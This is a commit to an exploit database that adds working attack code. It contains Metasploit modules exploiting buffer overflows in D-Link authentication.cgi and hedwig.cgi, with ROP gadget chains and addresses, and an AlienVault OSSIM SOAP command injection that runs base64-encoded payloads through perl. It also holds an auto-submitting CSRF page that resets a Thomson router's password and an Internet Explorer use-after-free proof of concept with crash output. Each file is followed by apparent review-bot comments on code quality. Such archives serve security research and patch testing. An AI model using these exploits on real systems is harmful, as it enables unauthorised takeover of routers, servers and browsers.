Updated 06_26_2014

Offensive Security 2014-06-26 04:37:14 +00:00
parent 3e99626f23
commit c28dbf00b0
6 changed files with 514 additions and 0 deletions


@ -30497,3 +30497,8 @@ id,file,description,date,author,platform,type,port
33856,platforms/php/webapps/33856.txt,"Viennabux Beta! 'cat' Parameter SQL Injection Vulnerability",2010-04-09,"Easy Laster",php,webapps,0
33857,platforms/php/webapps/33857.txt,"e107 0.7.x 'e107_admin/banner.php' SQL Injection Vulnerability",2010-04-21,"High-Tech Bridge SA",php,webapps,0
33858,platforms/php/webapps/33858.txt,"DBSite wb CMS 'index.php' Multiple Cross Site Scripting Vulnerabilities",2010-04-21,The_Exploited,php,webapps,0
33860,platforms/windows/dos/33860.html,"Internet Explorer 8, 9 & 10 - CInput Use-After-Free (MS14-035) - Crash PoC",2014-06-24,"Drozdova Liudmila",windows,dos,0
33862,platforms/hardware/remote/33862.rb,"D-Link authentication.cgi Buffer Overflow",2014-06-24,metasploit,hardware,remote,80
33863,platforms/hardware/remote/33863.rb,"D-Link hedwig.cgi Buffer Overflow in Cookie Header",2014-06-24,metasploit,hardware,remote,80
33865,platforms/linux/remote/33865.rb,"AlienVault OSSIM av-centerd Command Injection",2014-06-24,metasploit,linux,remote,40007
33866,platforms/hardware/webapps/33866.html,"Thomson TWG87OUIR - POST Password CSRF",2014-06-25,nopesled,hardware,webapps,0



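--- a/platforms/hardware/remote/33862.rb
+++ b/platforms/hardware/remote/33862.rb
@@ -0,0 +1,132 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+require 'msf/core'
+class Metasploit3 < Msf::Exploit::Remote
+Rank = NormalRanking
+include Msf::Exploit::Remote::HttpClient
+include Msf::Exploit::CmdStagerEcho
+def initialize(info = {})
+super(update_info(info,
+'Name' => 'D-Link authentication.cgi Buffer Overflow',
+'Description' => %q{
+This module exploits an remote buffer overflow vulnerability on several D-Link routers.
+The vulnerability exists in the handling of HTTP queries to the authentication.cgi with
+long password values. The vulnerability can be exploitable without authentication. This
+module has been tested successfully on D-Link firmware DIR645A1_FW103B11. Other firmwares
+such as the DIR865LA1_FW101b06 and DIR845LA1_FW100b20 are also vulnerable.
+},
+'Author' =>
+[
+'Roberto Paleari', # Vulnerability discovery
+'Craig Heffner', # also discovered the vulnerability / help with some parts of this module
+'Michael Messner <devnull[at]s3cur1ty.de>', # Metasploit module and verification on several other routers
+],
+'License' => MSF_LICENSE,
+'Platform' => ['linux'],
+'Arch' => ARCH_MIPSLE,
+'References' =>
+[
+['OSVDB', '95951'],
+['EDB', '27283'],
+['URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10008'], #advisory on vendor web site
+['URL', 'http://www.dlink.com/us/en/home-solutions/connect/routers/dir-645-wireless-n-home-router-1000'], #vendor web site of router
+['URL', 'http://roberto.greyhats.it/advisories/20130801-dlink-dir645.txt'] #original advisory
+],
+'Targets' =>
+[
+[ 'D-Link DIR-645 1.03',
+{
+'Offset' => 1011,
+'LibcBase' => 0x2aaf8000, #Router
+#'LibcBase' => 0x40854000, # QEMU environment
+'System' => 0x000531FF, # address of system
+'CalcSystem' => 0x000158C8, # calculate the correct address of system
+'CallSystem' => 0x000159CC, # call our system
+}
+]
+],
+'DisclosureDate' => 'Feb 08 2013',
+'DefaultTarget' => 0))
+end
+def check
+begin
+res = send_request_cgi({
+'uri' => "/authentication.cgi",
+'method' => 'GET'
+})
+if res && [200, 301, 302].include?(res.code) && res.body.to_s =~ /status.*uid/
+return Exploit::CheckCode::Detected
+end
+rescue ::Rex::ConnectionError
+return Exploit::CheckCode::Unknown
+end
+Exploit::CheckCode::Unknown
+end
+def exploit
+print_status("#{peer} - Accessing the vulnerable URL...")
+unless check == Exploit::CheckCode::Detected
+fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL")
+end
+print_status("#{peer} - Exploiting...")
+execute_cmdstager(
+:linemax => 200,
+:concat_operator => " && "
+)
+end
+def prepare_shellcode(cmd)
+shellcode = rand_text_alpha_upper(target['Offset']) # padding
+shellcode << [target['LibcBase'] + target['System']].pack("V") # s0 - address of system
+shellcode << rand_text_alpha_upper(16) # unused reg $s1 - $s4
+shellcode << [target['LibcBase'] + target['CallSystem']].pack("V") # s5 - second gadget (call system)
+# .text:000159CC 10 00 B5 27 addiu $s5, $sp, 0x170+var_160 # get the address of our command into $s5
+# .text:000159D0 21 28 60 02 move $a1, $s3 # not used
+# .text:000159D4 21 30 20 02 move $a2, $s1 # not used
+# .text:000159D8 21 C8 00 02 move $t9, $s0 # $s0 - system
+# .text:000159DC 09 F8 20 03 jalr $t9 # call system
+# .text:000159E0 21 20 A0 02 move $a0, $s5 # our cmd -> into a0 as parameter for system
+shellcode << rand_text_alpha_upper(12) # unused registers $s6 - $fp
+shellcode << [target['LibcBase'] + target['CalcSystem']].pack("V") # $ra - gadget nr 1 (prepare the parameter for system)
+# .text:000158C8 21 C8 A0 02 move $t9, $s5 # s5 - our second gadget
+# .text:000158CC 09 F8 20 03 jalr $t9 # jump the second gadget
+# .text:000158D0 01 00 10 26 addiu $s0, 1 # s0 our system address - lets calculate the right address
+shellcode << rand_text_alpha_upper(16) # filler in front of our command
+shellcode << cmd
+end
+def execute_command(cmd, opts)
+shellcode = prepare_shellcode(cmd)
+uid = rand_text_alpha(4)
+begin
+res = send_request_cgi({
+'method' => 'POST',
+'uri' => "/authentication.cgi",
+'cookie' => "uid=#{uid}",
+'encode_params' => false,
+'vars_post' => {
+'uid' => uid,
+'password' => rand_text_alpha(3) + shellcode,
+}
+})
+return res
+rescue ::Rex::ConnectionError
+fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
+end
+end
+end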
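Review bot: `execute_command(cmd, opts)` never reads `opts`; the signature is dictated by the CmdStager callback, so mark the parameter as intentionally unused, `def execute_command(cmd, _opts)`. The header comment's download URL `http//metasploit.com/download` is missing the colon after the scheme, and the same header is repeated in the hedwig.cgi and av-centerd modules of this commit. The description string reads `exploits an remote buffer overflow` where `a remote` is meant. `prepare_shellcode` and `execute_command` also appear verbatim in the hedwig.cgi module, so a one-line comment in each naming the other would tell a maintainer that the two copies exist.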


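--- a/platforms/hardware/remote/33863.rb
+++ b/platforms/hardware/remote/33863.rb
@@ -0,0 +1,130 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+require 'msf/core'
+class Metasploit3 < Msf::Exploit::Remote
+Rank = NormalRanking
+include Msf::Exploit::Remote::HttpClient
+include Msf::Exploit::CmdStagerEcho
+def initialize(info = {})
+super(update_info(info,
+'Name' => 'D-Link hedwig.cgi Buffer Overflow in Cookie Header',
+'Description' => %q{
+This module exploits an anonymous remote code execution vulnerability on several D-Link
+routers. The vulnerability exists in the handling of HTTP queries to the hedwig.cgi with
+long value cookies. This module has been tested successfully on D-Link DIR300v2.14, DIR600
+and the DIR645A1_FW103B11 firmware.
+},
+'Author' =>
+[
+'Roberto Paleari', # Vulnerability discovery
+'Craig Heffner', # also discovered the vulnerability / help with some parts of this exploit
+'Michael Messner <devnull[at]s3cur1ty.de>', # Metasploit module and verification on several other routers
+],
+'License' => MSF_LICENSE,
+'References' =>
+[
+['OSVDB', '95950'],
+['EDB', '27283'],
+['URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10008'], #advisory on vendor web site
+['URL', 'http://www.dlink.com/us/en/home-solutions/connect/routers/dir-645-wireless-n-home-router-1000'], #vendor web site of router
+['URL', 'http://roberto.greyhats.it/advisories/20130801-dlink-dir645.txt'] #original advisory
+],
+'Platform' => 'linux',
+'Arch' => ARCH_MIPSLE,
+'Targets' =>
+[
+[ 'Multiple Targets: D-Link DIR-645 v1.03, DIR-300 v2.14, DIR-600',
+{
+'Offset' => 973,
+'LibcBase' => 0x2aaf8000, # Router
+#'LibcBase' => 0x40854000, # QEMU environment
+'System' => 0x000531FF, # address of system
+'CalcSystem' => 0x000158C8, # calculate the correct address of system
+'CallSystem' => 0x000159CC, # call our system
+}
+]
+],
+'DisclosureDate' => 'Feb 08 2013',
+'DefaultTarget' => 0))
+end
+def check
+begin
+res = send_request_cgi({
+'uri' => "/hedwig.cgi",
+'method' => 'GET'
+})
+if res && [200, 301, 302].include?(res.code) && res.body.to_s =~ /unsupported HTTP request/
+return Exploit::CheckCode::Detected
+end
+rescue ::Rex::ConnectionError
+return Exploit::CheckCode::Unknown
+end
+Exploit::CheckCode::Unknown
+end
+def exploit
+print_status("#{peer} - Accessing the vulnerable URL...")
+unless check == Exploit::CheckCode::Detected
+fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL")
+end
+print_status("#{peer} - Exploiting...")
+execute_cmdstager(
+:linemax => 200,
+:concat_operator => " && "
+)
+end
+def prepare_shellcode(cmd)
+shellcode = rand_text_alpha_upper(target['Offset']) # padding
+shellcode << [target['LibcBase'] + target['System']].pack("V") # s0 - address of system
+shellcode << rand_text_alpha_upper(16) # unused reg $s1 - $s4
+shellcode << [target['LibcBase'] + target['CallSystem']].pack("V") # s5 - second gadget (call system)
+# .text:000159CC 10 00 B5 27 addiu $s5, $sp, 0x170+var_160 # get the address of our command into $s5
+# .text:000159D0 21 28 60 02 move $a1, $s3 # not used
+# .text:000159D4 21 30 20 02 move $a2, $s1 # not used
+# .text:000159D8 21 C8 00 02 move $t9, $s0 # $s0 - system
+# .text:000159DC 09 F8 20 03 jalr $t9 # call system
+# .text:000159E0 21 20 A0 02 move $a0, $s5 # our cmd -> into a0 as parameter for system
+shellcode << rand_text_alpha_upper(12) # unused registers $s6 - $fp
+shellcode << [target['LibcBase'] + target['CalcSystem']].pack("V") # $ra - gadget nr 1 (prepare the parameter for system)
+# .text:000158C8 21 C8 A0 02 move $t9, $s5 # s5 - our second gadget
+# .text:000158CC 09 F8 20 03 jalr $t9 # jump the second gadget
+# .text:000158D0 01 00 10 26 addiu $s0, 1 # s0 our system address - lets calculate the right address
+shellcode << rand_text_alpha_upper(16) # filler in front of our command
+shellcode << cmd
+end
+def execute_command(cmd, opts)
+shellcode = prepare_shellcode(cmd)
+begin
+res = send_request_cgi({
+'method' => 'POST',
+'uri' => "/hedwig.cgi",
+'cookie' => "uid=#{shellcode}",
+'encode_params' => false,
+'vars_post' => {
+rand_text_alpha(4) => rand_text_alpha(4)
+}
+})
+return res
+rescue ::Rex::ConnectionError
+fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
+end
+end
+end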
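Review bot: `check` has two identical exit paths — the `rescue ::Rex::ConnectionError` clause returns `Exploit::CheckCode::Unknown` and so does the fall-through after the `begin` block — so the rescue body can be left empty and fall through, with a comment such as `# host unreachable: nothing to conclude`. The explicit `return res` inside `execute_command`'s `begin` block is unnecessary in Ruby; `res` as the last expression of the block yields the same value. `'Platform' => 'linux'` here versus `'Platform' => ['linux']` in the sibling authentication.cgi module of this commit is a small inconsistency worth aligning one way or the other.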


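--- a/platforms/hardware/webapps/33866.html
+++ b/platforms/hardware/webapps/33866.html
@@ -0,0 +1,22 @@
+#Author: nopesled
+#Date: 24/06/14
+#Vulnerability: POST Password Reset CSRF
+#Tested on: Thomson TWG87OUIR (Hardware Version)
+<html>
+<head>
+<title>Thomson TWG87OUIR CSRF</title>
+</head>
+<body>
+<form name="exploit" method="post"
+action="http://192.168.0.1/goform/RgSecurity">
+<input type="hidden" name="HttpUserId" value="" />
+<input type="hidden" name="Password" value="newpass" />
+<input type="hidden" name="PasswordReEnter" value="newpass" />
+<input type="hidden" name="RestoreFactoryNo" value-="0x00" />
+</form>
+<script type="text/javascript">
+document.exploit.submit();
+</script>
+</body>
+</html>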
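Review bot: the header line `#Tested on: Thomson TWG87OUIR (Hardware Version)` reads like an unfilled placeholder — the hardware or firmware revision the PoC was verified against is not given, and no vendor advisory or CVE is cited. A short note on the root cause being demonstrated would also help a reader: the form submitted to `/goform/RgSecurity` carries no anti-CSRF token, so the password-change handler evidently does not require one, which is the control a fix must add, e.g. `<!-- Root cause: RgSecurity accepts a password change with no CSRF token binding the request to the session -->`. The `#Date: 24/06/14` header also disagrees with the 2014-06-25 date recorded for this entry in files.csv in the same commit.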

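--- a/platforms/linux/remote/33865.rb
+++ b/platforms/linux/remote/33865.rb
@@ -0,0 +1,140 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+require 'msf/core'
+require 'rexml/document'
+class Metasploit3 < Msf::Exploit::Remote
+Rank = ExcellentRanking
+include Msf::Exploit::Remote::HttpClient
+include REXML
+def initialize(info = {})
+super(update_info(info,
+'Name' => 'AlienVault OSSIM av-centerd Command Injection',
+'Description' => %q{
+This module exploits a code execution flaw in AlienVault 4.6.1 and
+prior. The vulnerability exists in the av-centerd SOAP web service,
+where the update_system_info_debian_package method uses perl backticks
+in an insecure way, allowing command injection. This module has been
+tested successfully on AlienVault 4.6.0.
+},
+'Author' =>
+[
+'Unknown', # From HP ZDI team, Vulnerability discovery
+'juan vazquez' # Metasploit module
+],
+'License' => MSF_LICENSE,
+'References' =>
+[
+['CVE', '2014-3804'],
+['BID', '67999'],
+['ZDI', '14-202'],
+['URL', 'http://forums.alienvault.com/discussion/2690']
+],
+'Privileged' => true,
+'Platform' => 'unix',
+'Arch' => ARCH_CMD,
+'Payload' =>
+{
+#'BadChars' => "[;`$<>|]", # Don't apply bcuz of the perl stub applied
+'Compat' => {
+'RequiredCmd' => 'perl netcat-e openssl python gawk'
+}
+},
+'DefaultOptions' =>
+{
+'SSL' => true
+},
+'Targets' =>
+[
+[ 'AlienVault <= 4.6.1', { }]
+],
+'DefaultTarget' => 0,
+'DisclosureDate' => 'May 5 2014'))
+register_options(
+[
+Opt::RPORT(40007)
+], self.class)
+end
+def check
+version = ""
+res = send_soap_request("get_dpkg")
+if res &&
+res.code == 200 &&
+res.headers['SOAPServer'] &&
+res.headers['SOAPServer'] =~ /SOAP::Lite/ &&
+res.body.to_s =~ /alienvault-center\s*([\d\.]*)-\d/
+version = $1
+end
+if version.empty? || version >= "4.7.0"
+return Exploit::CheckCode::Safe
+else
+return Exploit::CheckCode::Appears
+end
+end
+def exploit
+send_soap_request("update_system_info_debian_package", 1)
+end
+def build_soap_request(method)
+xml = Document.new
+xml.add_element(
+"soap:Envelope",
+{
+'xmlns:xsi' => "http://www.w3.org/2001/XMLSchema-instance",
+'xmlns:soapenc' => "http://schemas.xmlsoap.org/soap/encoding/",
+'xmlns:xsd' => "http://www.w3.org/2001/XMLSchema",
+'soap:encodingStyle' => "http://schemas.xmlsoap.org/soap/encoding/",
+'xmlns:soap' => "http://schemas.xmlsoap.org/soap/envelope/"
+})
+body = xml.root.add_element("soap:Body")
+m = body.add_element(
+method,
+{
+'xmlns' => "AV/CC/Util"
+})
+args = []
+args[0] = m.add_element("c-gensym3", {'xsi:type' => 'xsd:string'})
+args[1] = m.add_element("c-gensym5", {'xsi:type' => 'xsd:string'})
+args[2] = m.add_element("c-gensym7", {'xsi:type' => 'xsd:string'})
+args[3] = m.add_element("c-gensym9", {'xsi:type' => 'xsd:string'})
+(0..3).each { |i| args[i].text = rand_text_alpha(4 + rand(4)) }
+if method == "update_system_info_debian_package"
+args[4] = m.add_element("c-gensym11", {'xsi:type' => 'xsd:string'})
+perl_payload = "system(decode_base64"
+perl_payload += "(\"#{Rex::Text.encode_base64(payload.encoded)}\"))"
+args[4].text = "#{rand_text_alpha(4 + rand(4))}"
+args[4].text += " && perl -MMIME::Base64 -e '#{perl_payload}'"
+end
+xml.to_s
+end
+def send_soap_request(method, timeout = 20)
+soap = build_soap_request(method)
+res = send_request_cgi({
+'uri' => '/av-centerd',
+'method' => 'POST',
+'ctype' => 'text/xml; charset=UTF-8',
+'data' => soap,
+'headers' => {
+'SOAPAction' => "\"AV/CC/Util##{method}\""
+}
+}, timeout)
+res
+end
+end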
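Review bot: the version test in `check`, `version >= "4.7.0"`, is a String comparison and therefore orders lexicographically: a banner such as `4.10.0` (constructed example) sorts below `4.7.0` and would be reported as Appears although the description says only 4.6.1 and prior are affected; compare with `Gem::Version.new(version) >= Gem::Version.new("4.7.0")` instead. Reading the capture through `$1` directly after a multi-line `&&` condition is fragile; `Regexp.last_match(1)` makes the dependence on the preceding `=~` explicit. `send_soap_request(method, timeout = 20)` has no doc comment and `exploit` calls it with a timeout of 1, which deserves a `@param timeout [Integer]` line stating why that call uses a shorter value — the reason is not visible in this hunk.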


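--- a/platforms/windows/dos/33860.html
+++ b/platforms/windows/dos/33860.html
@@ -0,0 +1,85 @@
+<!--
+Exploit Title: MS14-035 Internet Explorer CInput Use-after-free POC
+Product: Internet Explorer
+Vulnerable version: 8,9,10
+Date: 23.06.2014
+Exploit Author: Drozdova Liudmila, ITDefensor Vulnerability Research Team (http://itdefensor.ru/)
+Vendor Homepage: http://www.microsoft.com/
+Tested on: Window 7 SP1 x86 IE 8,9,10
+CVE : unknown
+-->
+<html>
+<head><title>MS14-035 Internet Explorer CInput Use-after-free POC</title></head>
+<body>
+<form id="testfm">
+<textarea id="child" value="a1" ></textarea>
+<input id="child2" type="checkbox" name="option2" value="a2">Test check<Br>
+<textarea id="child3" value="a2" ></textarea>
+<input type="text" name="test1">
+</form>
+<script>
+var startfl=false;
+function changer() {
+// Call of changer function will happen inside mshtml!CFormElement::DoReset call, after execution of this function crash in DoReset will happen when accessing freed CInput element
+if (startfl) {
+document.getElementById("testfm").innerHTML = ""; // Destroy form contents, free next CInput in DoReset
+CollectGarbage();
+}
+}
+document.getElementById("child2").checked = true;
+document.getElementById("child2").onpropertychange=changer;
+startfl = true;
+document.getElementById("testfm").reset(); // DoReset call
+</script>
+</body>
+</html>
+<!--
+Crash details
+(fd4.d84): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+eax=6a5c0704 ebx=0556b358 ecx=081c2848 edx=00000004 esi=081c2848 edi=00000002
+eip=00000000 esp=025bce94 ebp=025bceb4 iopl=0 nv up ei pl zr na pe nc
+cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
+00000000 ?? ???
+0:004> kb
+ChildEBP RetAddr Args to Child
+WARNING: Frame IP not in any known module. Following frames may be wrong.
+025bce90 6a5d1742 091ac108 00001200 6aafcb54 0x0
+025bceb4 6a733150 0556b358 091ac108 6a73311d mshtml!CFormElement::DoReset+0xea
+025bced0 6a7ef10b 0556b358 091ac108 0363d298 mshtml!Method_void_void+0x75
+025bcf44 6a7fa6c6 0556b358 000003f2 00000001 mshtml!CBase::ContextInvokeEx+0x5dc
+025bcf94 6a81738a 0556b358 000003f2 00000001 mshtml!CElement::ContextInvokeEx+0x9d
+025bcfd0 6a79bc0e 0556b358 000003f2 00000001 mshtml!CFormElement::VersionedInvokeEx+0xf0
+025bd024 6c38a26e 0363d838 000003f2 00000001 mshtml!PlainInvokeEx+0xeb
+025bd060 6c38a1b9 08968530 000003f2 00000409 jscript!IDispatchExInvokeEx2+0x104
+025bd09c 6c38a43a 08968530 00000409 00000001 jscript!IDispatchExInvokeEx+0x6a
+025bd15c 6c38a4e4 000003f2 00000001 00000000 jscript!InvokeDispatchEx+0x98
+025bd190 6c39d9a8 08968530 025bd1c4 00000001 jscript!VAR::InvokeByName+0x139
+025bd1dc 6c39da4f 08968530 00000001 00000000 jscript!VAR::InvokeDispName+0x7d
+025bd208 6c39e4c7 08968530 00000000 00000001 jscript!VAR::InvokeByDispID+0xce
+025bd3a4 6c395d7d 025bd3bc 025bd500 0113ca98 jscript!CScriptRuntime::Run+0x2b80
+025bd48c 6c395cdb 025bd500 00000000 00000000 jscript!ScrFncObj::CallWithFrameOnStack+0xce
+025bd4d4 6c395ef1 025bd500 00000000 00000000 jscript!ScrFncObj::Call+0x8d
+025bd550 6c39620a 0113ca98 025bd710 00000000 jscript!CSession::Execute+0x15f
+025bd59c 6c39c3b9 08987c70 025bd710 025bd720 jscript!COleScript::ExecutePendingScripts+0x1bd
+025bd600 6c39c1d1 08987c70 002d346c 6a75f7b0 jscript!COleScript::ParseScriptTextCore+0x2a4
+025bd628 6a75f774 08987c74 03dc016c 002d346c jscript!COleScript::ParseScriptText+0x30
+--!>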
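Review bot: the trailing crash-details comment closes with `--!>` instead of `-->`; HTML5 parsers only accept `--!>` as a comment end through an error-recovery rule, so the last line should read `-->`. In the header, `Tested on: Window 7 SP1 x86` is missing the `s` in Windows, and `CVE : unknown` could at least direct the reader to the MS14-035 bulletin already named in the title so the vendor fix can be located. The single comment line inside `changer()` runs far past any readable width; splitting it into two or three comment lines above the `if` would keep the explanation of where the crash occurs legible.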